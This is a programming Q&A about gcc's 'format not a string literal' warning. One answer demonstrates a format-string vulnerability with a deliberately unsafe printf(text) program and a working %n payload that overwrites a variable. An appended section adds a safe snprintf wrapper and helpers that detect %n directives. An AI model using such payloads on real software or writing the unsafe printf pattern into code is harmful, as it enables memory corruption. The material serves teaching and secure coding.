c array - warning: format not a string literal

I'm attempting to learn C and already I've run into an issue. I assume it's trivial but I need to know it. I have written:

    #include <stdio.h>
    #include <string.h>

    int main()
    {
        char str_a[20];

        strcpy(str_a, "Hello, world!\n");
        printf(str_a);
    }

Once I attempt to compile it with gcc -g -o char_array2 char_array2.c, I receive an error saying:

    char_array2.c: In function ‘main’:
    char_array2.c:9:2: warning: format not a string literal and no format arguments [-Wformat-security]

Can anyone help please?

bigl asked Mar 14 '12 18:03


2 Answers

When using printf, the format string should be a string literal and not a variable:

    printf("%s", str_a);

MByD answered Sep 22 '22 17:09


Just to add something to the other answers: you'd better do this because a (long?) time ago people wrote printf like that and hackers found a way to read from and write to the stack, more here.
For example, a simple program like this:

    blackbear@blackbear-laptop:~$ cat format_vul.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char text[1024];
        static int test_var = -1;

        if(argc < 2) {
            printf("Use: %s <input>\n", argv[0]);
            exit(-1);
        }

        strcpy(text, argv[1]);

        printf("The correct way:\n");
        printf("%s", text);

        printf("\nThe wrong way:\n");
        printf(text);

        printf("\n[*]: test_var @ %8p = %d ( 0x%x )\n", &test_var, test_var, test_var);
    }
    blackbear@blackbear-laptop:~$ ./format_vul AAAA
    The correct way:
    AAAA
    The wrong way:
    AAAA
    [*]: test_var @ 0x804a024 = -1 ( 0xffffffff )

Can be used to change test_var's value from 0xffffff to something else, like 0xaabbccdd:

    blackbear@blackbear-laptop:~$ ./format_vul $(printf "\x24\xa0\x04\x08JUNK\x2 5\xa0\x04\x08JUNK\x26\xa0\x04\x08JUNK\x27\xa0\x04\x08").%8x.%8x.%8x.%8x.%8x. %8x.%8x.%8x.%8x.%110x.%n%239x%n%239x%n%239x%n
    The correct way:
    $�JUNK%�JUNK&�JUNK'�.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%110x.%n%239x%n%239 x%n%239x%n
    The wrong way:
    $�JUNK%�JUNK&�JUNK'�.bfffefec.  154d7c.  155d7c.  155d7c.      f0.      f0.b ffff4a4.       4.       4.                                                                                                        174.                                                                      50415243                                                                      50415243                                                                      50415243
    [*]: test_var @ 0x804a024 = -1430532899 ( 0xaabbccdd )
BlackBear answered Sep 23 '22 17:09
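Both answers make the same point: the untrusted text must be passed as an argument, never as the format string. The program below is an added example, not code from either answer, that shows the safe form (snprintf with a fixed "%s" format, so the text is copied literally whatever it contains) and adds two small audit helpers, count_conversions and has_n_directive (names assumed, not from the page), which scan a string for conversion directives and specifically for the %n directive that BlackBear's run uses to write to memory. The sample inputs are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Count printf conversion directives in s. "%%" is a literal percent
 * sign and is not counted. Added helper, not from the original answers. */
static int count_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" -> one literal '%' */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* True if s contains a %n directive, the one that writes to memory.
 * Skips flags, width, precision and length modifiers between the '%'
 * and the conversion character. Added helper, not from the page. */
static bool has_n_directive(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p))
            p++;
        if (*p == 'n')
            return true;
        if (!*p)
            break;              /* string ended inside a directive */
    }
    return false;
}

/* The safe way: the untrusted text is an argument, never the format.
 * Returns the length the text produced, as snprintf does. */
static int render_untrusted(char *out, size_t outsz, const char *untrusted)
{
    return snprintf(out, outsz, "%s", untrusted);
}

/* Check that the safe path copies the text byte for byte, including any
 * '%' characters, instead of interpreting them. */
static bool renders_literally(const char *untrusted)
{
    char buf[128];
    int len = render_untrusted(buf, sizeof buf, untrusted);
    return len >= 0 && (size_t)len == strlen(untrusted)
        && strcmp(buf, untrusted) == 0;
}

int main(void)
{
    /* constructed inputs: a harmless greeting, a hostile payload, a
     * string with an escaped percent sign */
    const char *inputs[] = { "Hello, world!", "AAAA%8x.%8x.%n", "100%% done" };
    char buf[64];

    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int len = render_untrusted(buf, sizeof buf, inputs[i]);
        printf("directives=%d  %%n=%s  rendered=\"%s\" (%d chars)\n",
               count_conversions(inputs[i]),
               has_n_directive(inputs[i]) ? "yes" : "no", buf, len);
    }
    return 0;
}
```

The helpers are an audit aid, not the fix: the fix is the fixed "%s" format in render_untrusted, which makes the content of the string irrelevant. Building with gcc -Werror=format-security turns the warning in the question into a hard error, so a non-literal format without arguments cannot reach a release build unnoticed.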